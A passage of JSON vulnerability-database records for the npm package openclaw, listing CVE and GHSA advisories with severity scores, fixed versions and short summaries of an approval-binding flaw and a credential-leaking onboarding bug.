                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:38:14Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6xg4-82hv-cp6f"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41299",
                    "reference_id": "CVE-2026-41299",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41299"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-6xg4-82hv-cp6f",
                    "reference_id": "GHSA-6xg4-82hv-cp6f",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-6xg4-82hv-cp6f"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-client-identity-spoofing-in-chat-send-gateway-provenance-guard",
                    "reference_id": "openclaw-client-identity-spoofing-in-chat-send-gateway-provenance-guard",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "7.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:38:14Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-client-identity-spoofing-in-chat-send-gateway-provenance-guard"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-41299",
                "GHSA-6xg4-82hv-cp6f"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-24m7-jx1g-hqde"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89353?format=api",
            "vulnerability_id": "VCID-258k-a4dw-tfae",
            "summary": "OpenClaw: pnpm dlx approvals did not bind local script operands\n## Summary\n\nBefore OpenClaw 2026.4.2, `pnpm dlx` approval planning did not bind local script operands the same way as related `pnpm exec` flows. A local script approved through a `pnpm dlx` path could be replaced before execution without invalidating the approval.\n\n## Impact\n\nAn operator could approve a benign local script and then execute modified script contents through the still-valid approval plan. This was an approval-integrity bug in the node-host command-planning path.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `176c059b05357df1bc09d4328a2380670859eeff` — bind local scripts in `pnpm dlx` approval plans\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @Kazamayc for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/176c059b05357df1bc09d4328a2380670859eeff",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/176c059b05357df1bc09d4328a2380670859eeff"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w6wx-jq6j-6mcj",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w6wx-jq6j-6mcj"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-w6wx-jq6j-6mcj",
                    "reference_id": "GHSA-w6wx-jq6j-6mcj",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-w6wx-jq6j-6mcj"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"
                }
            ],
            "aliases": [
                "GHSA-w6wx-jq6j-6mcj"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-258k-a4dw-tfae"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90123?format=api",
            "vulnerability_id": "VCID-26kp-dbu2-pqej",
            "summary": "OpenClaw: Endpoint persists after trust decline, leaking gateway credentials\n## Summary\nRemote onboarding preserves attacker-discovered endpoint after trust decline, routing gateway credentials to it\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real shipped onboarding trust-decline bug because the declined discovered URL survived into the manual prompt, but operator acceptance of that prefill is still required, so medium.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `2a75416634837c21ed05b8c3ed906eb7a7807060` — 2026-03-30T20:03:06+01:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zsxsoft for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41300",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11185",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11219",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11226",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41300"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/2a75416634837c21ed05b8c3ed906eb7a7807060",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:02:56Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/2a75416634837c21ed05b8c3ed906eb7a7807060"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9f4w-67g7-mqwv",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:02:56Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9f4w-67g7-mqwv"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41300",
                    "reference_id": "CVE-2026-41300",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41300"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-9f4w-67g7-mqwv",
                    "reference_id": "GHSA-9f4w-67g7-mqwv",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-9f4w-67g7-mqwv"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-attacker-discovered-endpoint-preservation-in-remote-onboarding",
                    "reference_id": "openclaw-attacker-discovered-endpoint-preservation-in-remote-onboarding",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:02:56Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-attacker-discovered-endpoint-preservation-in-remote-onboarding"
                }
            ],
            "fixed_packages": [
                {
